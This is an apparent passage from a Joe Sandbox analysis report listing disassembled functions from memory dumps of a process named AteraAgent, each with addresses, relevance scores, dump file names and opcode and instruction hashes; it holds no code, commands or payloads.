                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ddff2762a3984f21b437a4a25c7390929fe7f92eab52833e0af31d09bba9250e
                                                                                                                                                                                                                                          • Instruction ID: 1fb1f439eeba3517f1b51bcb49cb02a932bd63695357ffa26cf27d1c270f7335
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddff2762a3984f21b437a4a25c7390929fe7f92eab52833e0af31d09bba9250e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6918931B0EA4E4FEB68DA9C94616B437D1FFD9314F8601FAD04CC76A2DE59AC069381
                                                                                                                                                                                                                                          Function 00007FFD9B4173E1 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 545b84a2a0af57879d82405a5dd4d64effe27b1290316608a3033d2d9010e663
                                                                                                                                                                                                                                          • Instruction ID: 830f61646996b3afb97e068590bad93c66c96d6846baf01588c332cf52af232f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 545b84a2a0af57879d82405a5dd4d64effe27b1290316608a3033d2d9010e663
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B10770E09A1D8FDB94EF98C494BADB7B2FF69304F1151A9D01DE72A5CB34A981CB40
                                                                                                                                                                                                                                          Function 00007FFD9B425B70 Relevance: .3, Instructions: 310COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b80aedaeabfe3d991f4547d89669add2fd221dc4ced7e12af1240eec7a71123e
                                                                                                                                                                                                                                          • Instruction ID: b6fdac577fb0e4948504cf2653bad8d88f5d1302a3176c47ae2b85e45d6dcaa2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b80aedaeabfe3d991f4547d89669add2fd221dc4ced7e12af1240eec7a71123e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1971F152B1FD1E4FF7B591ED247C27413C1EFA8699B2240B7E88DC72A5ED18AD066380
                                                                                                                                                                                                                                          Function 00007FFD9B42DD50 Relevance: .3, Instructions: 307COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f325c9335192cbf8da70d8384c22fec289c356777528cf0fdac2bdb5ab1a412e
                                                                                                                                                                                                                                          • Instruction ID: 031a456084db7d101608507e7c0db85ddfb7cba5ff45fc0fe68694bdb1c1f6b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f325c9335192cbf8da70d8384c22fec289c356777528cf0fdac2bdb5ab1a412e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45811932B1DD1D0FE6A8E75C98697B933C2EFD8360B0601B6E44DC72A6DE19AC425381
                                                                                                                                                                                                                                          Function 00007FFD9B413FCD Relevance: .3, Instructions: 305COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 499f94b46109a33ce374c36f872ce57df8b4fe64be50aceb9349752eed780e78
                                                                                                                                                                                                                                          • Instruction ID: c35b525d2c92343391e43bd4912355019e8dbbcb86c2eba6f79af65f7590160f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499f94b46109a33ce374c36f872ce57df8b4fe64be50aceb9349752eed780e78
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BA12531E0A61D4FE764DBA4D4256F8BBB0FF62314F45127ED05C972E2DA382A46CB81
                                                                                                                                                                                                                                          Function 00007FFD9B424894 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d7eca11583de674c648bc520c9120349c5e63115a23779fadf45c1fa09b9ea66
                                                                                                                                                                                                                                          • Instruction ID: 9b127b7e9f599b8c6dce1f9de99d11f42a16af8000dfd873dd8c3af684053d17
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7eca11583de674c648bc520c9120349c5e63115a23779fadf45c1fa09b9ea66
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83913630B2DB4A4FE768DFA884955B677E0FF55314B10067DD19AC31AAEE24F8429780
                                                                                                                                                                                                                                          Function 00007FFD9B423C20 Relevance: .3, Instructions: 294COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 944baff8ec8aa2cbf71d949b58ab4e01a4c6025ded931d27a9beef92e25417f6
                                                                                                                                                                                                                                          • Instruction ID: 7106955faa7c3bbe154f6de4fba1e9fc7d8e60d242b820e65e76f7f7bc8e40be
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 944baff8ec8aa2cbf71d949b58ab4e01a4c6025ded931d27a9beef92e25417f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D691673071DB494FE728DFA894955B677E0EF55314F10067ED48AC32AAEE34F8429781
                                                                                                                                                                                                                                          Function 00007FFD9B6237C5 Relevance: .3, Instructions: 294COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2542562358.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ba3f8a4bb2b748c834715f2a116661b6be1eeb86d851599f21fd408576e714e6
                                                                                                                                                                                                                                          • Instruction ID: 5a8e322ff7595ed11a7b58b2e3b83abf65b9da653a71217e7fce0b529e4795fc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba3f8a4bb2b748c834715f2a116661b6be1eeb86d851599f21fd408576e714e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71819630B0D94D4FE7A9D76CD46567937D0EF5A31071500FEE49ECB2A2DA19EC428781
                                                                                                                                                                                                                                          Function 00007FFD9B41D469 Relevance: .3, Instructions: 286COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 502a4fcf37b35176833e2702df7d8cd80537ed9b9d4c8311a18d259f3f972ae3
                                                                                                                                                                                                                                          • Instruction ID: 392d068779e5728cbd35d4848bf923dc6bb0dcd0821a8fac0a301df64e98dc28
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 502a4fcf37b35176833e2702df7d8cd80537ed9b9d4c8311a18d259f3f972ae3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 919162B1F18A4D4FEB94EB989865BECB7B1FFA9304F5402B9D01CD32E6DE2468418741
                                                                                                                                                                                                                                          Function 00007FFD9B417DB9 Relevance: .3, Instructions: 285COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3d5d4c22beef03990b0fbf21a2d271186cb278f64323e27291a91a7053eb7458
                                                                                                                                                                                                                                          • Instruction ID: 256680d55d6468d783ee6106fc5254cba50eed664400b09918def49e8b38e52a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d5d4c22beef03990b0fbf21a2d271186cb278f64323e27291a91a7053eb7458
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5291E671E1EA4D4FEBA4DF68C8656ADB7E1FF64304F01067AE019D3296DE386D018740
                                                                                                                                                                                                                                          Function 00007FFD9B41CCC7 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d046d03bb85428046e5cbc09347e9bf6d7b302870b262ad7b39c44692ba5bc59
                                                                                                                                                                                                                                          • Instruction ID: 198c0de3aa1c9e7576bdfc89dea68433491e45ecd4cb2539b9a11c896b118feb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d046d03bb85428046e5cbc09347e9bf6d7b302870b262ad7b39c44692ba5bc59
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB812931F0EA5A4FE769A7ACA8655B83BE1EF95325B0501BBD04DCB1E3DE14AC419380
                                                                                                                                                                                                                                          Function 00007FFD9B41A015 Relevance: .3, Instructions: 267COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3320b99dc23f4704ec9e1c0c2ca8e83ea1cbf7e6f2c604763a132e473381cf92
                                                                                                                                                                                                                                          • Instruction ID: 5bcb80db5d43dd2f8acef920e2738e1f3b1e4e9e57b354ea90418a7fb1b31035
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3320b99dc23f4704ec9e1c0c2ca8e83ea1cbf7e6f2c604763a132e473381cf92
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E812872A1CE4E4FE7A8EB488065766B3D2FFA4354F01427AD05EC32A5DE38BD459341
                                                                                                                                                                                                                                          Function 00007FFD9B4234C8 Relevance: .3, Instructions: 267COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d4b4d455ae4e02c0cd49235d539a7fcbac63849725222a614e38f3e3b3bd4cdd
                                                                                                                                                                                                                                          • Instruction ID: 8428d38ec0742cff35fd29480682adaf151c99ec817991992d0e43fbc59c47c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b4d455ae4e02c0cd49235d539a7fcbac63849725222a614e38f3e3b3bd4cdd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2811972B0FA8D4FEB55DFDC98A41A87BF1FF54354B0402BBD048872A7E925AA42D740
                                                                                                                                                                                                                                          Function 00007FFD9B42FA29 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 481e927145780083d0c594f728a747673c2aa01c2a846b331c059cd3b32527c3
                                                                                                                                                                                                                                          • Instruction ID: 80c65f9cf41ad9802f8943d50953c55cac310b5d4e2d42bf3737fd145e6bdab3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 481e927145780083d0c594f728a747673c2aa01c2a846b331c059cd3b32527c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C81D231B09A8D8FEB95EFA8C464AA97BE1FF68300F0501B6D409D72A6DE34AD01D740
                                                                                                                                                                                                                                          Function 00007FFD9B414610 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ae4212785ad84b8acf94016854535eba9480928c85265fe39606475e7552d412
                                                                                                                                                                                                                                          • Instruction ID: c5e19db81ceaf40983cb3c3292b2ba09eefe5f15604ba3b26611d540b4ff8063
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae4212785ad84b8acf94016854535eba9480928c85265fe39606475e7552d412
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D917D71E18A4E8FDB84EF58C854BA9B7F1FF69304F144279D41CD729ADA34A842CB80
                                                                                                                                                                                                                                          Function 00007FFD9B41BDE7 Relevance: .3, Instructions: 258COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3fe68307fec997b0b8f84ebae7eedd3160a7de3b0031a876cbb90a4a5ec90998
                                                                                                                                                                                                                                          • Instruction ID: 4f3d46968e46d06a56056c22c403a53336a685a0739ac4263cc23b416c7bed6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fe68307fec997b0b8f84ebae7eedd3160a7de3b0031a876cbb90a4a5ec90998
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5613A22F1EB8D0FE7A5DB6848655A57BF1EFA5254B0942FBC04DC71E7DD18A8068301
                                                                                                                                                                                                                                          Function 00007FFD9B41EA20 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 48d0387d2814fb6f8889f81f65ccb7cfd5ab7f795784e1f9d72314dea4ed6fb7
                                                                                                                                                                                                                                          • Instruction ID: 3681de2f5cbf07f2784a3d77809fa896e45ac9aba49291144408e994acf48a73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48d0387d2814fb6f8889f81f65ccb7cfd5ab7f795784e1f9d72314dea4ed6fb7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4713722B0FA8E0FF779966C54783792BE1EF9665471E02FBD089C72A7ED049D068341
                                                                                                                                                                                                                                          Function 00007FFD9B41C6E0 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5d62b5988a519207156c5654c54ba8b5a026e0412cf99206d68a5a58e7e76e5f
                                                                                                                                                                                                                                          • Instruction ID: 2d803e8809e6d5842aa7574e6726939f6abc5484119ff85de2a9678cee1244ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d62b5988a519207156c5654c54ba8b5a026e0412cf99206d68a5a58e7e76e5f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D711331B19A0A4FEB799BA884AC57577D1FF59314B1504BED08EC32A6DE28BC41E341
                                                                                                                                                                                                                                          Function 00007FFD9B42CDF8 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dfd03d09929a04b430dfef8f2bc7c8d7d961994246c50ff55c7026df7b0cbf12
                                                                                                                                                                                                                                          • Instruction ID: 75c4541c56099700a4786d8d7252062e25b9de06776620bab9a2d29ed6655025
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfd03d09929a04b430dfef8f2bc7c8d7d961994246c50ff55c7026df7b0cbf12
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A71383060DB4D4BEB78EA58C5A96B173E0FF95304F19457ED08B872A2DE28F945C781
                                                                                                                                                                                                                                          Function 00007FFD9B624BC9 Relevance: .2, Instructions: 243COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2542562358.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f675773bf63f1a069c88a1f1766d02239a7212784f22ffba7198883b6adda126
                                                                                                                                                                                                                                          • Instruction ID: d53d5dca877bde34029535b0015612bdfefb23757b9413d5f76deb3f9700a2db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f675773bf63f1a069c88a1f1766d02239a7212784f22ffba7198883b6adda126
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C71B232B0990D8FEBA4EB6C84696B877E1FFA8341F05007AD55DD72A6DE29BC41C740
                                                                                                                                                                                                                                          Function 00007FFD9B62CBBF Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2542562358.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ed547525f133a3f16ed0ef312bdd7d80fb19050bc71eb76b304f0e58ec8bf2d8
                                                                                                                                                                                                                                          • Instruction ID: ff77ecb32898f113544ad054f425bb1008feff76b0c85b88e27e66312d7cce83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed547525f133a3f16ed0ef312bdd7d80fb19050bc71eb76b304f0e58ec8bf2d8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8A1A770E1951D8FDBA8DF58D8A9BA8B7B1FB58301F1141EAD00DE72A1CB756A80CF40
                                                                                                                                                                                                                                          Function 00007FFD9B415D3F Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e86a1fd4f343513977aa922086f455426d94bddf94060990b9b38cc323369bef
                                                                                                                                                                                                                                          • Instruction ID: a4e43bbd7113ccb35eb596b87feae16da9f02fdc3378854dd34c14deeef90d3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e86a1fd4f343513977aa922086f455426d94bddf94060990b9b38cc323369bef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1819D70E1861D8FEB98EF58D495AACB3F1FF65304F504179E419E7296CA35AC42CB80
                                                                                                                                                                                                                                          Function 00007FFD9B42DC05 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fdf1e78f11a017eb267d1e3d086df159f0db17a7aa15a7df9249c3c2d3da3927
                                                                                                                                                                                                                                          • Instruction ID: 7242139a37bb8a149b6be2a421cfec3eeb520009caacbb9f546b52a7e4283fa3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdf1e78f11a017eb267d1e3d086df159f0db17a7aa15a7df9249c3c2d3da3927
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0513721B19D0D0FE7E4EB6C98697B937D1EF98314F0501BBE84DC72A1DE589D429341
                                                                                                                                                                                                                                          Function 00007FFD9B41D76E Relevance: .2, Instructions: 226COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 956449b1d388515b2c573c45940e9a7f0ea19640b04d404e17f091cdcf838c18
                                                                                                                                                                                                                                          • Instruction ID: 93576b3dc8ea74a1d6b547320b87916fc7746aa592d82283044ae2f56f766450
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 956449b1d388515b2c573c45940e9a7f0ea19640b04d404e17f091cdcf838c18
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D5169B2F0E94D4FFB689A6C9C652B977E1EFA5314F0501BAD06DC71E6DD292C028380
